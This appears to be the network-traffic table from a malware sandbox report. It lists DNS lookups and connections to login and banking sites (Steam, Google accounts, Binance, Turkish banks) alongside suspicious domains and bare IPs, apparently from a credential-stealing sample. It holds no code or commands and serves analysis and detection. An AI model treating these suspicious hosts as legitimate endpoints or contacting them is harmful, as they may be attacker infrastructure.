| US | 104.18.4.160:80 | gamejolt.com | tcp |
| FR | 51.91.227.135:80 | portal.reemo.io | tcp |
| VN | 49.213.95.230:80 | id.zalo.me | tcp |
| SG | 157.230.193.203:80 | sshstores.net | tcp |
| US | 208.109.57.122:443 | www.gameutha.com | tcp |
| US | 104.18.1.181:80 | parsec.app | tcp |
| GB | 173.222.13.119:80 | store.steampowered.com | tcp |
| SG | 18.136.136.90:80 | azota.vn | tcp |
| GB | 104.103.202.103:443 | steamcommunity.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| PK | 43.250.84.104:80 | pakrail.gov.pk | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| GB | 104.103.202.103:80 | steamcommunity.com | tcp |
| SG | 18.143.238.134:80 | azota.vn | tcp |
| VN | 125.212.254.122:80 | trade.vndirect.com.vn | tcp |
| US | 162.159.136.232:80 | discord.com | tcp |
| GB | 104.103.202.103:80 | steamcommunity.com | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| SG | 157.230.193.203:443 | sshstores.net | tcp |
| KE | 197.136.130.6:80 | students.kuccps.net | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| VN | 103.174.216.148:80 | vio.edu.vn | tcp |
| SG | 18.136.136.90:80 | azota.vn | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 188.114.97.2:443 | worrystitchsounddywuwp.site | tcp |
| GB | 216.58.201.110:80 | remotedesktop.google.com | tcp |
| GB | 18.245.143.97:80 | accounts.binance.com | tcp |
| GB | 18.245.253.83:80 | accounts.shutterstock.com | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| US | 172.64.145.202:443 | users.nexusmods.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 104.26.15.71:80 | anilist.co | tcp |
| US | 8.8.8.8:53 | ftp.sshstores.net | udp |
| US | 8.8.8.8:53 | ftp.account.protonvpn.com | udp |
| US | 8.8.8.8:53 | pop.ny3.blynk.cloud | udp |
| US | 8.8.8.8:53 | ftp.steamcommunity.com | udp |
| US | 8.8.8.8:53 | ssh.parsec.app | udp |
| US | 8.8.8.8:53 | ssh.windscribe.com | udp |
| US | 8.8.8.8:53 | ftp.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | pop.skills.shawacademy.com | udp |
| DE | 173.249.52.237:443 | www.ncsrail.com | tcp |
| US | 104.20.221.62:80 | crossout.net | tcp |
| US | 8.8.8.8:53 | ftp.accounts.google.com | udp |
| US | 8.8.8.8:53 | mail.login.arduino.cc | udp |
| US | 8.8.8.8:53 | mx0.mail.ovh.net | udp |
| US | 104.16.119.50:80 | auth.riotgames.com | tcp |
| US | 8.8.8.8:53 | ssh.steamcommunity.com | udp |
| US | 8.8.8.8:53 | help.steampowered.com | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 104.26.8.68:80 | www.game-debate.com | tcp |
| US | 172.67.70.42:80 | minecraftcapes.net | tcp |
| US | 8.8.8.8:53 | ftp.help.steampowered.com | udp |
| US | 8.8.8.8:53 | ftp.zahcomputers.pk | udp |
| US | 8.8.8.8:53 | mx3.zoho.com | udp |
| US | 8.8.8.8:53 | pop3.login.arduino.cc | udp |
| US | 8.8.8.8:53 | ftp.ncsrail.com | udp |
| US | 8.8.8.8:53 | pop.help.steampowered.com | udp |
| US | 8.8.8.8:53 | ssh.account.protonvpn.com | udp |
| US | 8.8.8.8:53 | store.steampowered.com | udp |
| US | 8.8.8.8:53 | mxa-004fae02.gslb.pphosted.com | udp |
| US | 8.8.8.8:53 | pop.app.blokada.org | udp |
| US | 8.8.8.8:53 | pop.portal.reemo.io | udp |
| US | 8.8.8.8:53 | mail.portal.reemo.io | udp |
| US | 8.8.8.8:53 | ssh.portal.reemo.io | udp |
| US | 8.8.8.8:53 | pop3.forum.mobilism.org | udp |
| US | 8.8.8.8:53 | ssh.school.wvbs.org | udp |
| US | 8.8.8.8:53 | imap.skills.shawacademy.com | udp |
| US | 8.8.8.8:53 | mail.events.crowdsense.ai | udp |
| US | 8.8.8.8:53 | ssh.game-debate.com | udp |
| US | 8.8.8.8:53 | pop3.portal.yabatech.edu.ng | udp |
| US | 8.8.8.8:53 | auth.riotgames.com | udp |
| US | 8.8.8.8:53 | 122.254.212.125.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.216.174.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.143.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.253.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mail.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | ssh.minecraftcapes.net | udp |
| US | 8.8.8.8:53 | ssh.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | imap.login.arduino.cc | udp |
| US | 8.8.8.8:53 | pop.students.kuccps.net | udp |
| US | 8.8.8.8:53 | pop.school.wvbs.org | udp |
| US | 8.8.8.8:53 | mail.store.steampowered.com | udp |
| HK | 154.92.15.189:80 | ji.alie3ksggg.com | tcp |
| US | 8.8.8.8:53 | pop.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | imap.school.wvbs.org | udp |
| US | 8.8.8.8:53 | ssh.anilist.co | udp |
| US | 8.8.8.8:53 | mail.portal.yabatech.edu.ng | udp |
| US | 8.8.8.8:53 | imap.ny3.blynk.cloud | udp |
| US | 8.8.8.8:53 | mail.portal.health.go.ke | udp |
| SG | 18.143.238.134:80 | azota.vn | tcp |
| GB | 18.245.143.97:443 | accounts.binance.com | tcp |
| VN | 202.160.124.82:443 | myaccount.vndirect.com.vn | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| GB | 142.250.187.243:80 | app.blokada.org | tcp |
| US | 64.225.16.22:80 | ny3.blynk.cloud | tcp |
| US | 104.20.93.59:80 | windscribe.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| GB | 18.245.253.83:443 | accounts.shutterstock.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| DE | 185.159.159.143:80 | account.protonvpn.com | tcp |
| US | 172.64.145.202:80 | users.nexusmods.com | tcp |
| SG | 143.92.75.92:80 | shopee.ph | tcp |
| GB | 216.58.201.110:80 | remotedesktop.google.com | tcp |
| GB | 104.103.202.103:80 | steamcommunity.com | tcp |
| GB | 104.103.202.103:80 | steamcommunity.com | tcp |
| US | 34.120.58.86:80 | is-apps.telusinternational.com | tcp |
| US | 188.114.97.2:80 | worrystitchsounddywuwp.site | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| US | 34.120.58.86:80 | is-apps.telusinternational.com | tcp |
| US | 8.8.8.8:53 | unknowncheats.me | udp |
| US | 8.8.8.8:53 | unknowncheats.me | udp |
| US | 8.8.8.8:53 | pop3.hub360.com.ng | udp |
| US | 8.8.8.8:53 | account.protonvpn.com | udp |
| PK | 43.250.84.104:80 | pakrail.gov.pk | tcp |
| SG | 157.230.193.203:80 | sshstores.net | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| PH | 203.161.188.178:80 | oauth.bpi.com.ph | tcp |
| VN | 202.160.124.58:80 | id.vndirect.com.vn | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | ssh.parsec.app | udp |
| US | 8.8.8.8:53 | ssh.gameutha.com | udp |
| US | 8.8.8.8:53 | ftp.accounts.google.com | udp |
| FR | 51.91.227.135:80 | portal.reemo.io | tcp |
| BG | 185.141.63.9:80 | tcp | |
| DE | 142.132.202.219:2023 | tcp | |
| KE | 41.76.172.119:80 | portal.health.go.ke | tcp |
| DE | 173.249.52.237:80 | ftp.ncsrail.com | tcp |
| US | 104.26.11.45:80 | spwarta.mobidziennik.pl | tcp |
| US | 104.18.1.181:80 | parsec.app | tcp |
| SG | 157.230.193.203:80 | sshstores.net | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | ssh.account.protonvpn.com | udp |
| US | 8.8.8.8:53 | ftp.myaccount.vndirect.com.vn | udp |
| US | 104.18.4.160:443 | gamejolt.com | tcp |
| US | 104.20.221.62:80 | crossout.net | tcp |
| US | 8.8.8.8:53 | imap.login.arduino.cc | udp |
| US | 8.8.8.8:53 | pop.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | mail.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | ftp.steamcommunity.com | udp |
| US | 8.8.8.8:53 | mail.login.arduino.cc | udp |
| US | 8.8.8.8:53 | lista-serwerow.emecz.pl | udp |
| US | 8.8.8.8:53 | mxa-004fae02.gslb.pphosted.com | udp |
| US | 8.8.8.8:53 | pop3.portal.yabatech.edu.ng | udp |
| US | 8.8.8.8:53 | mail.ny3.blynk.cloud | udp |
| US | 8.8.8.8:53 | ftp.azota.vn | udp |
| US | 8.8.8.8:53 | mail.users.nexusmods.com | udp |
| US | 8.8.8.8:53 | pop.students.kuccps.net | udp |
| US | 8.8.8.8:53 | lista-serwerow.emecz.pl | udp |
| US | 8.8.8.8:53 | lista-minecraft.pl | udp |
| US | 8.8.8.8:53 | shopee.ph | udp |
| US | 8.8.8.8:53 | ftp.gamejolt.com | udp |
| US | 8.8.8.8:53 | mx3.mail.ovh.net | udp |
| US | 8.8.8.8:53 | pop3.login.arduino.cc | udp |
| HK | 154.92.15.189:80 | ji.alie3ksggg.com | tcp |
| GB | 18.245.253.89:80 | accounts.shutterstock.com | tcp |
| US | 8.8.8.8:53 | ssh.portal.reemo.io | udp |
| GB | 18.245.143.43:80 | accounts.binance.com | tcp |
| PH | 203.161.188.178:80 | oauth.bpi.com.ph | tcp |
| US | 8.8.8.8:53 | ssh.accounts.google.com | udp |
| US | 8.8.8.8:53 | mail.anilist.co | udp |
| US | 8.8.8.8:53 | ssh.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | aspmx.l.google.com | udp |
| US | 8.8.8.8:53 | ssh.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | imap.help.steampowered.com | udp |
| US | 8.8.8.8:53 | ftp.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | ssh.help.steampowered.com | udp |
| US | 8.8.8.8:53 | ftp.users.nexusmods.com | udp |
| US | 8.8.8.8:53 | mail.forum.mobilism.org | udp |
| US | 8.8.8.8:53 | mail.store.steampowered.com | udp |
| US | 8.8.8.8:53 | mail.help.steampowered.com | udp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 104.16.119.50:443 | auth.riotgames.com | tcp |
| US | 104.16.119.50:80 | auth.riotgames.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| GB | 104.103.202.103:443 | help.steampowered.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| GB | 173.222.13.119:80 | store.steampowered.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| VN | 103.174.216.148:443 | vio.edu.vn | tcp |
| GB | 216.58.201.110:80 | remotedesktop.google.com | tcp |
| US | 34.120.58.86:80 | is-apps.telusinternational.com | tcp |
| US | 34.120.58.86:80 | is-apps.telusinternational.com | tcp |
| SG | 143.92.75.92:80 | shopee.ph | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 104.18.9.28:80 | krunker.io | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| IT | 185.196.8.22:80 | ckrehdr.net | tcp |
| DE | 142.132.202.219:2023 | tcp | |
| VN | 125.212.254.122:443 | trade.vndirect.com.vn | tcp |
| SG | 18.136.136.90:80 | ftp.azota.vn | tcp |
| VN | 202.160.124.82:80 | myaccount.vndirect.com.vn | tcp |
| US | 104.26.12.251:80 | unknowncheats.me | tcp |
| US | 172.67.70.42:80 | minecraftcapes.net | tcp |
| US | 104.26.8.68:80 | game-debate.com | tcp |
| SG | 18.136.136.90:80 | ftp.azota.vn | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | mailgate.login.arduino.cc | udp |
| US | 8.8.8.8:53 | ftp.id.zalo.me | udp |
| US | 8.8.8.8:53 | pop3.skills.shawacademy.com | udp |
| US | 8.8.8.8:53 | ftp.auth.riotgames.com | udp |
| DE | 185.159.159.143:80 | account.protonvpn.com | tcp |
| VN | 202.160.124.82:80 | myaccount.vndirect.com.vn | tcp |
| US | 104.18.4.160:80 | gamejolt.com | tcp |
| GB | 104.103.202.103:80 | help.steampowered.com | tcp |
| US | 8.8.8.8:53 | mail.school.wvbs.org | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 8.8.8.8:53 | airbox.home | udp |
| US | 8.8.8.8:53 | ftp.airbox.home | udp |
| US | 8.8.8.8:53 | mail.myaccount.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | mail.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | mail.ny3.blynk.cloud | udp |
| US | 8.8.8.8:53 | ssh.users.nexusmods.com | udp |
| US | 8.8.8.8:53 | ssh.sshstores.net | udp |
| US | 8.8.8.8:53 | mail.login.arduino.cc | udp |
| US | 8.8.8.8:53 | mail.students.kuccps.net | udp |
| US | 8.8.8.8:53 | imap.store.steampowered.com | udp |
| US | 8.8.8.8:53 | vddswrwooe4osvbi3yy3gdgi575xmw6dwguqvdehvkzvbs3quzca.mx-verification.google.com | udp |
| US | 8.8.8.8:53 | mail.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | imap.login.arduino.cc | udp |
| US | 8.8.8.8:53 | imap.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | mail24.mydevil.net | udp |
| US | 8.8.8.8:53 | pop.students.kuccps.net | udp |
| US | 8.8.8.8:53 | pop3.portal.yabatech.edu.ng | udp |
| US | 8.8.8.8:53 | ftp.steamcommunity.com | udp |
| US | 8.8.8.8:53 | imap.events.crowdsense.ai | udp |
| US | 8.8.8.8:53 | ftp.gamejolt.com | udp |
| US | 8.8.8.8:53 | ftp.shopee.ph | udp |
| US | 8.8.8.8:53 | mail.lista-minecraft.pl | udp |
| US | 8.8.8.8:53 | mail.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | ftp.trade.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | ssh.ncsrail.com | udp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 162.159.136.232:80 | discord.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| GB | 104.103.202.103:443 | help.steampowered.com | tcp |
| US | 34.120.58.86:80 | is-apps.telusinternational.com | tcp |
| US | 8.8.8.8:53 | ftp.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | ftp.vio.edu.vn | udp |
| US | 8.8.8.8:53 | ssh.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | ssh.help.steampowered.com | udp |
| US | 8.8.8.8:53 | ssh.school.wvbs.org | udp |
| US | 8.8.8.8:53 | pop3.school.wvbs.org | udp |
| US | 8.8.8.8:53 | mail.users.nexusmods.com | udp |
| DE | 185.159.159.143:80 | account.protonvpn.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| SG | 18.143.238.134:80 | ftp.azota.vn | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| GB | 216.58.201.110:80 | remotedesktop.google.com | tcp |
| VN | 49.213.95.230:80 | id.zalo.me | tcp |
| US | 104.20.93.59:80 | windscribe.com | tcp |
| US | 104.16.119.50:80 | auth.riotgames.com | tcp |
| GB | 104.103.202.103:443 | help.steampowered.com | tcp |
| SG | 157.230.193.203:80 | sshstores.net | tcp |
| US | 162.159.136.232:80 | discord.com | tcp |
| FR | 51.91.227.135:80 | portal.reemo.io | tcp |
| GB | 104.103.202.103:80 | help.steampowered.com | tcp |
| US | 208.109.57.122:80 | www.gameutha.com | tcp |
| VN | 202.160.124.58:443 | id.vndirect.com.vn | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 172.64.145.202:80 | users.nexusmods.com | tcp |
| PL | 185.36.169.113:80 | lista-serwerow.emecz.pl | tcp |
| PL | 188.210.221.79:80 | mail.lista-minecraft.pl | tcp |
| VN | 125.212.254.122:80 | trade.vndirect.com.vn | tcp |
| US | 104.26.11.45:443 | spwarta.mobidziennik.pl | tcp |
| DE | 173.249.52.237:443 | ftp.ncsrail.com | tcp |
| US | 8.8.8.8:53 | ftp.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | ssh.airbox.home | udp |
| US | 8.8.8.8:53 | ftp.shopee.ph | udp |
| US | 8.8.8.8:53 | ssh.account.protonvpn.com | udp |
| US | 8.8.8.8:53 | pop.portal.reemo.io | udp |
| US | 8.8.8.8:53 | mail.help.steampowered.com | udp |
| US | 8.8.8.8:53 | aolweb.aol.meb.gov.tr | udp |
| US | 8.8.8.8:53 | aolweb.aol.meb.gov.tr | udp |
| US | 8.8.8.8:53 | subesiz.vakifbank.com.tr | udp |
| PH | 203.161.188.178:80 | oauth.bpi.com.ph | tcp |
| US | 8.8.8.8:53 | imap.skills.shawacademy.com | udp |
| US | 8.8.8.8:53 | mail.airbox.home | udp |
| US | 8.8.8.8:53 | ssh.ny3.blynk.cloud | udp |
| US | 8.8.8.8:53 | vddswrwooe4osvbi3yy3gdgi575xmw6dwguqvdehvkzvbs3quzca.mx-verification.google.com | udp |
| US | 8.8.8.8:53 | mailgate.portal.yabatech.edu.ng | udp |
| US | 8.8.8.8:53 | ssh.gameutha.com | udp |
| US | 8.8.8.8:53 | mail.account.protonvpn.com | udp |
| US | 8.8.8.8:53 | route1.mx.cloudflare.net | udp |
| VN | 103.174.216.148:80 | vio.edu.vn | tcp |
| PL | 188.210.221.79:80 | mail.lista-minecraft.pl | tcp |
| US | 8.8.8.8:53 | pop3.help.steampowered.com | udp |
| US | 8.8.8.8:53 | ssh.sshstores.net | udp |
| US | 8.8.8.8:53 | mail.ny3.blynk.cloud | udp |
| US | 8.8.8.8:53 | ftp.airbox.home | udp |
| US | 8.8.8.8:53 | imap.portal.yabatech.edu.ng | udp |
| US | 8.8.8.8:53 | pop3.students.kuccps.net | udp |
| US | 8.8.8.8:53 | imap.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | mail.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | mail.students.kuccps.net | udp |
| US | 8.8.8.8:53 | imap.store.steampowered.com | udp |
| US | 8.8.8.8:53 | ssh.ncsrail.com | udp |
| US | 8.8.8.8:53 | ftp.gamejolt.com | udp |
| US | 8.8.8.8:53 | imap.events.crowdsense.ai | udp |
| US | 8.8.8.8:53 | mail.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | ftp.trade.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | pop3.app.blokada.org | udp |
| PL | 91.209.116.56:80 | moje.gwo.pl | tcp |
| GB | 18.245.253.89:443 | accounts.shutterstock.com | tcp |
| US | 8.8.8.8:53 | ssh.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | pop3.school.wvbs.org | udp |
| US | 8.8.8.8:53 | ftp.is-apps.telusinternational.com | udp |
| US | 8.8.8.8:53 | ftp.steamcommunity.com | udp |
| US | 8.8.8.8:53 | pop3.forum.mobilism.org | udp |
| PH | 203.161.188.178:80 | oauth.bpi.com.ph | tcp |
| US | 104.20.221.62:80 | crossout.net | tcp |
| SG | 157.230.193.203:80 | sshstores.net | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| GB | 104.103.202.103:80 | steamcommunity.com | tcp |
| PL | 188.210.221.79:80 | mail.lista-minecraft.pl | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| VN | 103.174.216.148:80 | vio.edu.vn | tcp |
| GB | 104.103.202.103:80 | steamcommunity.com | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | ssh.gamejolt.com | udp |
| US | 8.8.8.8:53 | mxb-004fae02.gslb.pphosted.com | udp |
| US | 8.8.8.8:53 | pop.account.protonvpn.com | udp |
| US | 8.8.8.8:53 | ftp.zahcomputers.pk | udp |
| US | 8.8.8.8:53 | ssh.id.zalo.me | udp |
| US | 8.8.8.8:53 | internetbankaciligi.fibabanka.com.tr | udp |
| US | 8.8.8.8:53 | giris.ibb.istanbul | udp |
| US | 8.8.8.8:53 | aolweb.aol.meb.gov.tr | udp |
| US | 8.8.8.8:53 | 113.169.36.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.221.210.188.in-addr.arpa | udp |
| GB | 216.58.201.110:80 | remotedesktop.google.com | tcp |
| US | 104.26.12.251:443 | unknowncheats.me | tcp |
| US | 34.120.58.86:80 | is-apps.telusinternational.com | tcp |
| SG | 18.136.136.90:80 | ftp.azota.vn | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| GB | 18.245.143.43:443 | accounts.binance.com | tcp |
| US | 8.8.8.8:53 | pop3.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | mail.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | ssh.zahcomputers.pk | udp |
| US | 8.8.8.8:53 | mailgate.login.arduino.cc | udp |
| US | 8.8.8.8:53 | mailgate.events.crowdsense.ai | udp |
| US | 8.8.8.8:53 | ftp.myaccount.vndirect.com.vn | udp |
| IT | 185.196.8.22:80 | ckrehdr.net | tcp |
| SG | 18.143.238.134:80 | ftp.azota.vn | tcp |
| US | 188.114.97.2:80 | worrystitchsounddywuwp.site | tcp |
| US | 104.18.4.160:443 | gamejolt.com | tcp |
| GB | 104.103.202.103:80 | steamcommunity.com | tcp |
| SG | 157.230.193.203:80 | sshstores.net | tcp |
| US | 104.26.9.68:80 | game-debate.com | tcp |
| TR | 193.108.213.15:80 | sube.halkbank.com.tr | tcp |
| GB | 104.103.202.103:443 | steamcommunity.com | tcp |
| TR | 212.175.170.107:80 | aolweb.meb.gov.tr | tcp |
| TR | 212.175.170.107:80 | aolweb.meb.gov.tr | tcp |
| GB | 18.245.253.83:80 | accounts.shutterstock.com | tcp |
| US | 172.64.145.202:80 | users.nexusmods.com | tcp |
| US | 104.18.9.28:443 | krunker.io | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| VN | 125.212.254.122:80 | trade.vndirect.com.vn | tcp |
| PL | 82.177.190.71:80 | dolnoslaskie.edu.com.pl | tcp |
| DE | 173.249.52.237:80 | ftp.ncsrail.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| VN | 202.160.124.58:80 | id.vndirect.com.vn | tcp |
| US | 104.26.11.45:80 | spwarta.mobidziennik.pl | tcp |
| DE | 185.159.159.143:443 | account.protonvpn.com | tcp |
| US | 8.8.8.8:53 | pop3.app.blokada.org | udp |
| US | 8.8.8.8:53 | mx2.mail.ovh.net | udp |
| US | 8.8.8.8:53 | ftp.spwarta.mobidziennik.pl | udp |
| US | 8.8.8.8:53 | ssh.vio.edu.vn | udp |
| US | 8.8.8.8:53 | imap.skills.shawacademy.com | udp |
| US | 8.8.8.8:53 | mail.airbox.home | udp |
| US | 8.8.8.8:53 | mailgate.portal.yabatech.edu.ng | udp |
| US | 8.8.8.8:53 | mail.help.steampowered.com | udp |
| US | 8.8.8.8:53 | mail.id.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | ssh.myaccount.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | 56.116.209.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aspmx2.googlemail.com | udp |
| US | 8.8.8.8:53 | imap.store.steampowered.com | udp |
| US | 8.8.8.8:53 | mail.ny3.blynk.cloud | udp |
| US | 8.8.8.8:53 | mail.myaccount.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | ssh.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | mx3.mail.ovh.net | udp |
| US | 8.8.8.8:53 | ftp.trade.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | ssh.ncsrail.com | udp |
| US | 8.8.8.8:53 | mail.portal.reemo.io | udp |
| US | 8.8.8.8:53 | mail.school.wvbs.org | udp |
| US | 8.8.8.8:53 | ssh.steamcommunity.com | udp |
| US | 8.8.8.8:53 | mail.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | pop3.students.kuccps.net | udp |
| US | 8.8.8.8:53 | mail.app.blokada.org | udp |
| US | 8.8.8.8:53 | mail.students.kuccps.net | udp |
| US | 8.8.8.8:53 | imap.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | mail.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | mail.id.zalo.me | udp |
| US | 8.8.8.8:53 | esube.iskur.gov.tr | udp |
| US | 8.8.8.8:53 | pop3.school.wvbs.org | udp |
| US | 8.8.8.8:53 | ftp.is-apps.telusinternational.com | udp |
| US | 8.8.8.8:53 | imap.gameutha.com | udp |
| US | 8.8.8.8:53 | mail.forum.mobilism.org | udp |
| US | 8.8.8.8:53 | mailgate.forum.mobilism.org | udp |
| US | 8.8.8.8:53 | ssh.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | pop.auth.riotgames.com | udp |
| US | 8.8.8.8:53 | mail.login.arduino.cc | udp |
| US | 8.8.8.8:53 | imap.forum.mobilism.org | udp |
| US | 8.8.8.8:53 | pop3.portal.reemo.io | udp |
| US | 8.8.8.8:53 | ssh.users.nexusmods.com | udp |
| US | 8.8.8.8:53 | imap.login.arduino.cc | udp |
| US | 8.8.8.8:53 | pop3.help.steampowered.com | udp |
| US | 8.8.8.8:53 | ftp.airbox.home | udp |
| US | 8.8.8.8:53 | pop3.skills.shawacademy.com | udp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| GB | 173.222.13.40:80 | tcp | |
| US | 15.204.234.61:9100 | tcp | |
| SG | 143.92.75.92:80 | shopee.ph | tcp |
| PL | 188.210.221.79:80 | mail.lista-minecraft.pl | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| VN | 202.160.124.82:80 | myaccount.vndirect.com.vn | tcp |
| US | 8.8.8.8:53 | mailgate.login.arduino.cc | udp |
| US | 8.8.8.8:53 | mail.spwarta.mobidziennik.pl | udp |
| US | 8.8.8.8:53 | ssh.id.vndirect.com.vn | udp |
| US | 8.8.8.8:53 | ssh.accounts.binance.com | udp |
| US | 8.8.8.8:53 | bireysel.ziraatbank.com.tr | udp |
| PL | 188.210.221.79:443 | mail.lista-minecraft.pl | tcp |
| DE | 185.159.159.143:80 | account.protonvpn.com | tcp |
| VN | 202.160.124.58:80 | id.vndirect.com.vn | tcp |
| US | 104.16.119.50:80 | auth.riotgames.com | tcp |
| GB | 104.103.202.103:80 | steamcommunity.com | tcp |
| GB | 18.245.143.43:80 | accounts.binance.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 208.109.57.122:80 | www.gameutha.com | tcp |
| VN | 49.213.95.230:443 | id.zalo.me | tcp |
| US | 104.16.119.50:80 | auth.riotgames.com | tcp |
| US | 104.26.12.251:80 | unknowncheats.me | tcp |
| PH | 203.161.188.178:80 | oauth.bpi.com.ph | tcp |
| US | 8.8.8.8:53 | imap.students.kuccps.net | udp |
| US | 8.8.8.8:53 | ftp.myaccount.vndirect.com.vn | udp |
| TR | 212.175.170.107:80 | aolweb.meb.gov.tr | tcp |
| US | 8.8.8.8:53 | pop3.portal.health.go.ke | udp |
| US | 8.8.8.8:53 | ssh.is-apps.telusinternational.com | udp |
| US | 8.8.8.8:53 | mail.help.steampowered.com | udp |
| TR | 212.175.170.107:80 | aolweb.meb.gov.tr | tcp |
| US | 34.120.58.86:80 | is-apps.telusinternational.com | tcp |
| US | 8.8.8.8:53 | mail.users.nexusmods.com | udp |
| US | 8.8.8.8:53 | mail.oauth.bpi.com.ph | udp |
| US | 8.8.8.8:53 | pop3.ny3.blynk.cloud | udp |
| US | 8.8.8.8:53 | mail.remotedesktop.google.com | udp |
| US | 8.8.8.8:53 | mailgate.events.crowdsense.ai | udp |
| US | 8.8.8.8:53 | mailgate.h5.stepworkstime.com | udp |
| US | 8.8.8.8:53 | pop3.store.steampowered.com | udp |
| US | 8.8.8.8:53 | mailgate.hub360.com.ng | udp |
| US | 8.8.8.8:53 | passport.yandex.com.tr | udp |
| US | 8.8.8.8:53 | e-devlet.riskmerkezi.org | udp |
| TR | 195.142.246.58:80 | subesiz.vakifbank.com.tr | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| SG | 18.136.136.90:80 | ftp.azota.vn | tcp |
| PL | 91.209.116.56:443 | moje.gwo.pl | tcp |
| PL | 185.36.169.113:443 | lista-serwerow.emecz.pl | tcp |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
| RU | 87.240.132.67:80 | tcp | |
